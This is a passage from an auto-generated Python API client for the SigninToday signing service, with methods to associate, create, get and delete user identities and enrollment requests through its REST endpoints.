Associate to a user of the organization an already existing identity of a provider. The _provider_data_ field is an object and is different for each provider. The minimum set of information to provide as provider_data is the following: - **aruba** - _auth_domain_ : string - _username_ : string - _password_ : string - **aruba-auto** - _auth_domain_ : string - _username_ : string - _password_ : string - **infocert** - _username_ : string - _password_ : string - **namirial** - _id_titolare_ : string - _id_otp_ : string - _username_ : string - _password_ : string # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.associate_identity(organization_id, user_id, identity_association, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param IdentityAssociation identity_association: Provider data to associate (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2004
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.associate_identity_with_http_info(organization_id, user_id, identity_association, **kwargs) # noqa: E501
def associate_identity_with_http_info(self, organization_id, user_id, identity_association, **kwargs): # noqa: E501
"""Associate to an user an already existing identity # noqa: E501
Associate to an user of the organization an already existing identity of a provider. The _provider_data_ field is an object and is different for each provider. The minimum set of information to provide as provider_data is the following: - **aruba** - _auth_domain_ : string - _username_ : string - _password_ : string - **aruba-auto** - _auth_domain_ : string - _username_ : string - _password_ : string - **infocert** - _username_ : string - _password_ : string - **namirial** - _id_titolare_ : string - _id_otp_ : string - _username_ : string - _password_ : string # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.associate_identity_with_http_info(organization_id, user_id, identity_association, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param IdentityAssociation identity_association: Provider data to associate (required)
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2004, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'user_id', 'identity_association'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method associate_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `associate_identity`") # noqa: E501
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ApiValueError("Missing the required parameter `user_id` when calling `associate_identity`") # noqa: E501
# verify the required parameter 'identity_association' is set
if ('identity_association' not in local_var_params or
local_var_params['identity_association'] is None):
raise ApiValueError("Missing the required parameter `identity_association` when calling `associate_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'user_id' in local_var_params:
path_params['user-id'] = local_var_params['user_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'identity_association' in local_var_params:
body_params = local_var_params['identity_association']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/users/{user-id}/wallet', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2004', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_token_from_identity(self, organization_id, create_identityby_token, **kwargs): # noqa: E501
"""Create an identity from token # noqa: E501
This API allows to create an identity from a token. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_token_from_identity(organization_id, create_identityby_token, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param CreateIdentitybyToken create_identityby_token: Body of the request to create an identity from a token (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2012
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_token_from_identity_with_http_info(organization_id, create_identityby_token, **kwargs) # noqa: E501
def create_token_from_identity_with_http_info(self, organization_id, create_identityby_token, **kwargs): # noqa: E501
"""Create an identity from token # noqa: E501
This API allows to create an identity from a token. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_token_from_identity_with_http_info(organization_id, create_identityby_token, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param CreateIdentitybyToken create_identityby_token: Body of the request to create an identity from a token (required)
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2012, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'create_identityby_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_token_from_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `create_token_from_identity`") # noqa: E501
# verify the required parameter 'create_identityby_token' is set
if ('create_identityby_token' not in local_var_params or
local_var_params['create_identityby_token'] is None):
raise ApiValueError("Missing the required parameter `create_identityby_token` when calling `create_token_from_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_identityby_token' in local_var_params:
body_params = local_var_params['create_identityby_token']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/create/token', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2012', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_appearance(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Delete the appearance of an identity # noqa: E501
This API allows you to delete the appearance associated with an identity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_appearance(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of a user. It is also used to restrict the requested operation to the scope of that identity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2004
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_appearance_with_http_info(organization_id, identity_id, **kwargs) # noqa: E501
def delete_appearance_with_http_info(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Delete the appearance of an identity # noqa: E501
This API allows you to delete the appearance associated with an identity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_appearance_with_http_info(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of a user. It is also used to restrict the requested operation to the scope of that identity (required)
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2004, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_appearance" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `delete_appearance`") # noqa: E501
# verify the required parameter 'identity_id' is set
if ('identity_id' not in local_var_params or
local_var_params['identity_id'] is None):
raise ApiValueError("Missing the required parameter `identity_id` when calling `delete_appearance`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'identity_id' in local_var_params:
path_params['identity-id'] = local_var_params['identity_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/{identity-id}/appearance', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2004', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_enrollment_request(self, organization_id, enrollment_id, **kwargs): # noqa: E501
"""Delete an enrollment request # noqa: E501
This API allows you to delete an enrollment request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_enrollment_request(organization_id, enrollment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id enrollment_id: The **enrollment-id** is the uuid code that identifies a specific enrollment request (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2012
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_enrollment_request_with_http_info(organization_id, enrollment_id, **kwargs) # noqa: E501
def delete_enrollment_request_with_http_info(self, organization_id, enrollment_id, **kwargs): # noqa: E501
"""Delete an enrollment request # noqa: E501
This API allows you to delete an enrollment request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_enrollment_request_with_http_info(organization_id, enrollment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id enrollment_id: The **enrollment-id** is the uuid code that identifies a specific enrollment request (required)
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2012, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'enrollment_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_enrollment_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `delete_enrollment_request`") # noqa: E501
# verify the required parameter 'enrollment_id' is set
if ('enrollment_id' not in local_var_params or
local_var_params['enrollment_id'] is None):
raise ApiValueError("Missing the required parameter `enrollment_id` when calling `delete_enrollment_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'enrollment_id' in local_var_params:
path_params['enrollment-id'] = local_var_params['enrollment_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identity-requests/{enrollment-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2012', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_identity(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Delete an identity # noqa: E501
This API allows you to delete an identity of a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of a user. It is also used to restrict the requested operation to the scope of that identity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2003
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_identity_with_http_info(organization_id, identity_id, **kwargs) # noqa: E501
def delete_identity_with_http_info(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Delete an identity # noqa: E501
This API allows you to delete an identity of a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity_with_http_info(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of a user. It is also used to restrict the requested operation to the scope of that identity (required)
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2003, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `delete_identity`") # noqa: E501
# verify the required parameter 'identity_id' is set
if ('identity_id' not in local_var_params or
local_var_params['identity_id'] is None):
raise ApiValueError("Missing the required parameter `identity_id` when calling `delete_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'identity_id' in local_var_params:
path_params['identity-id'] = local_var_params['identity_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/{identity-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2003', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_enrollment_request(self, organization_id, enrollment_id, **kwargs): # noqa: E501
"""Get information about an enrollment request # noqa: E501
This API allows you to get information about an enrollment request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_enrollment_request(organization_id, enrollment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id enrollment_id: The **enrollment-id** is the uuid code that identifies a specific enrollment request (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2011
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_enrollment_request_with_http_info(organization_id, enrollment_id, **kwargs) # noqa: E501
def get_enrollment_request_with_http_info(self, organization_id, enrollment_id, **kwargs): # noqa: E501
"""Get information about an enrollment request # noqa: E501
This API allows you to get information about an enrollment request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_enrollment_request_with_http_info(organization_id, enrollment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id enrollment_id: The **enrollment-id** is the uuid code that identifies a specific enrollment request (required)
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2011, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'enrollment_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_enrollment_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `get_enrollment_request`") # noqa: E501
# verify the required parameter 'enrollment_id' is set
if ('enrollment_id' not in local_var_params or
local_var_params['enrollment_id'] is None):
raise ApiValueError("Missing the required parameter `enrollment_id` when calling `get_enrollment_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'enrollment_id' in local_var_params:
path_params['enrollment-id'] = local_var_params['enrollment_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identity-requests/{enrollment-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2011', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_identity(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Get information about an identity # noqa: E501
This API allows you to get all the information of an identity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identity(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of a user. It is also used to restrict the requested operation to the scope of that identity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_identity_with_http_info(organization_id, identity_id, **kwargs) # noqa: E501
def get_identity_with_http_info(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Get information about an identity # noqa: E501
This API allows you to get all the information of an identity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identity_with_http_info(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of a user. It is also used to restrict the requested operation to the scope of that identity (required)
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2002, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `get_identity`") # noqa: E501
# verify the required parameter 'identity_id' is set
if ('identity_id' not in local_var_params or
local_var_params['identity_id'] is None):
raise ApiValueError("Missing the required parameter `identity_id` when calling `get_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'identity_id' in local_var_params:
path_params['identity-id'] = local_var_params['identity_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/{identity-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_enrollment_requests(self, organization_id, **kwargs): # noqa: E501
"""Enumerate the enrollment requests of an organization # noqa: E501
This API allows you to enumerate the enrollment requests of an organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_enrollment_requests(organization_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param str where_provider: Returns the identity requests that have been issued by the specified provider
:param str where_user: Returns the identity requests of the specified user, searched by their id
:param str where_first_name: Returns the identity requests of the users that have the specified first name
:param str where_last_name: Returns the identity requests of the users that have the specified last name
:param str where_registered_by: Returns the identity requests registered by this user
:param str where_fiscal_code: Returns the identity requests that have the specified fiscal code
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2005
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_enrollment_requests_with_http_info(organization_id, **kwargs) # noqa: E501
def list_enrollment_requests_with_http_info(self, organization_id, **kwargs): # noqa: E501
"""Enumerate the enrollment requests of an organization # noqa: E501
This API allows you to enumerate the enrollment requests of an organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_enrollment_requests_with_http_info(organization_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param str where_provider: Returns the identity requests that have been issued by the specified provider
:param str where_user: Returns the identity requests of the specified user, searched by their id
:param str where_first_name: Returns the identity requests of the users that have the specified first name
:param str where_last_name: Returns the identity requests of the users that have the specified last name
:param str where_registered_by: Returns the identity requests registered by this user
:param str where_fiscal_code: Returns the identity requests that have the specified fiscal code
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2005, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
